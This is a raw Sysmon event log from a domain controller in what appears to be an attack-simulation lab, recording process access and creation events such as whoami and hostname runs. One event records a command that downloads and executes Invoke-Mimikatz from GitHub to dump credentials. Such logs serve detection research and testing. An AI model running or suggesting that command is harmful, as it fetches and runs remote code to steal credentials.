14:07:47.393{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203192Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E9B3-6040-434E-00000000AD01}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203191Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B3-6040-434E-00000000AD01}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203190Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.397{5ABCFE62-E9B3-6040-434E-00000000AD01}2200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203189Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203188Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.393{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 10341000x80000000000000002203187Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.237{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9B3-6040-424E-00000000AD01}5632C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203186Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203185Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203184Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203183Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.237{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203182Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.237{5ABCFE62-99F1-603E-7907-00000000AD01}3080348C:\Windows\system32\csrss.exe{5ABCFE62-E9B3-6040-424E-00000000AD01}5632C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203181Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.237{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B3-6040-424E-00000000AD01}5632C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d1532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64) 154100x80000000000000002203180Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.240{5ABCFE62-E9B3-6040-424E-00000000AD01}5632C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000002203179Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.221{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9B3-6040-414E-00000000AD01}4412C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203178Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203177Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203176Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203175Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.221{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203174Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.221{5ABCFE62-99F1-603E-7907-00000000AD01}30806064C:\Windows\system32\csrss.exe{5ABCFE62-E9B3-6040-414E-00000000AD01}4412C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203173Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.221{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9B3-6040-414E-00000000AD01}4412C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d1532a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64) 154100x80000000000000002203172Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:47.229{5ABCFE62-E9B3-6040-414E-00000000AD01}4412C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002203243Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:48.893{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 